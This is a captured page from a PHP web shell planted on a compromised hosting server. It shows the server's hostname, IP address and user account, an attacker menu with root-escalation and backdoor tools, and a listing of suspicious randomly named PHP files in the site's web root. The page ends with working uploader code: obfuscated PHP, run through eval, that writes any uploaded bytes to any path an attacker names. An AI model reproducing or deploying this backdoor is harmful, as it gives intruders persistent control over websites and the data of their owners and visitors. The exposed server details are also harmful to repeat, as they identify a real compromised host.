Linux moon.hostseba.com 4.18.0-553.51.1.lve.el8.x86_64 #1 SMP Tue May 6 15:14:12 UTC 2025 x86_64
LiteSpeed
Server IP : 103.174.152.68 & Your IP : 216.73.216.121
Domains :
Cant Read [ /etc/named.conf ]
User : julaysp1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
julaysp1 /
public_html /
Delete
Unzip
Name
Size
Permission
Date
Action
.well-known
[ DIR ]
dr-xr-xr-x
2025-08-31 20:43
adi
[ DIR ]
drwxr-xr-x
2025-09-06 08:22
admin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
api_key
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
assets
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
cgi-bin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
folderadmin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
folderanimenew
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
font
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
fonts
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
footer
[ DIR ]
drwxr-xr-x
2025-09-06 06:17
heroadmin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
includes
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
keyadmin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
nibondon
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
order
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
pages
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
pdf
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
photo
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
photo_smart
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
pin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
qr_photo
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
roaring
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
test
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
themesth
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
wp-admin
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
wp-coach
[ DIR ]
drwxr-xr-x
2025-09-06 08:30
wp-content
[ DIR ]
dr-xr-xr-x
2025-09-01 07:25
wp-includes
[ DIR ]
dr-xr-xr-x
2025-09-01 07:26
.htaccess
22.69
KB
-rw-r--r--
2025-09-06 10:26
amrlwbfc.php
53.21
KB
-rw-r--r--
2025-09-02 11:40
billmao.php
216.63
KB
-rw-r--r--
2025-09-04 18:19
db.php
61
B
-rw-r--r--
2025-09-06 02:44
error_log
12.29
KB
-rw-r--r--
2025-09-06 09:04
functions-helper.php
10.7
KB
-rw-r--r--
2025-09-06 04:00
goods.php
583
B
-rw-r--r--
2025-09-03 22:50
index.php
631
B
-rw-r--r--
2025-09-06 09:04
j250815_13.zip
3.58
KB
-rw-r--r--
2025-09-06 02:44
j250816_13.zip
3.58
KB
-rw-r--r--
2025-09-06 02:44
k.php
72
B
-rw-r--r--
2025-09-04 23:58
mnkalo.php
168.78
KB
-rw-r--r--
2025-09-04 18:24
nxpnlnfk.php
11.8
KB
-rw-r--r--
2025-09-02 11:28
ok.txt
4
B
-rw-r--r--
2025-07-27 00:22
php.ini
105
B
-rw-r--r--
2025-09-02 11:40
puffboat.php
3.78
KB
-rw-r--r--
2025-09-04 10:26
puskbguq.php
11.8
KB
-rw-r--r--
2025-09-02 11:40
robots.txt
3.02
KB
-rw-r--r--
2025-09-05 03:00
sirx.php
136.81
KB
-rw-r--r--
2025-09-04 18:07
t6wer-send.php
453
B
-rw-r--r--
2025-09-05 18:07
x-cp-KHoU3LOW.php
448
B
-rw-r--r--
2025-09-05 11:04
x-cp-cDequjHb.php
448
B
-rw-r--r--
2025-09-05 13:26
z.php
8.49
KB
-rw-r--r--
2025-07-31 02:22
zb.php
23.37
KB
-rw-r--r--
2025-09-02 12:24
zt2.php
52.07
KB
-rw-r--r--
2025-09-04 08:48
Save
Rename
<input type="file" id="upload_files" name="upload_files" multiple="multiple"> <button id="b" value="upload" onclick='upload("upload_files",0);'>Upload</button> <br><p>Status : <span id="status" style="color:red;">No file added</span></p> <script> function upload(fileInputId, fileIndex) { var url = window.location.pathname; var scriptname = url.substring(url.lastIndexOf('/')+1); var filename = document.getElementById('upload_files').value; var filename = filename.match(/[^\\/]*$/)[0]; document.getElementById("status").textContent = "Uploading the file "+filename+", please wait.."; document.getElementById("status").style.color = "blue"; // take the file from the input var file = document.getElementById(fileInputId).files[fileIndex]; var reader = new FileReader(); reader.readAsBinaryString(file); // alternatively you can use readAsDataURL reader.onloadend = function(evt) { // create XHR instance xhr = new XMLHttpRequest(); // send the file through POST xhr.open("POST", scriptname+"?name="+filename, true); // make sure we have the sendAsBinary method on all browsers XMLHttpRequest.prototype.mySendAsBinary = function(text){ var data = new ArrayBuffer(text.length); var ui8a = new Uint8Array(data, 0); for (var i = 0; i < text.length; i++) ui8a[i] = (text.charCodeAt(i) & 0xff); if(typeof window.Blob == "function") { var blob = new Blob([data]); }else{ var bb = new (window.MozBlobBuilder || window.WebKitBlobBuilder || window.BlobBuilder)(); bb.append(data); var blob = bb.getBlob(); } this.send(blob); } // let's track upload progress var eventSource = xhr.upload || xhr; eventSource.addEventListener("progress", function(e) { // get percentage of how much of the current file has been sent var position = e.position || e.loaded; var total = e.totalSize || e.total; var percentage = Math.round((position/total)*100); // here you should write your own code how you wish to proces this }); // state change observer - we need to know when and if the file was successfully uploaded xhr.onreadystatechange = function() { if(xhr.readyState == 4) { if(xhr.status == 200) { // process success document.getElementById("status").textContent = "The file "+filename+" Uploaded successfully in same folder."; document.getElementById("status").style.color = "green"; }else{ // process error } } }; // start sending xhr.mySendAsBinary(evt.target.result); }; } </script> <?php $text = 'if(!empty(ssdddddddd_GET["name"])){ ssddddddddinputHandler = fopen("php://input", "r"); ssddddddddfileHandler = fopen(ssdddddddd_GET["name"], "w+"); while(true) { ssddddddddbuffer = fgets(ssddddddddinputHandler, 4096); if (strlen(ssddddddddbuffer) == 0) { fclose(ssddddddddinputHandler); fclose(ssddddddddfileHandler); return true; } fwrite(ssddddddddfileHandler, ssddddddddbuffer); } }'; eval(str_replace('ssdddddddd','$',$text)); ?>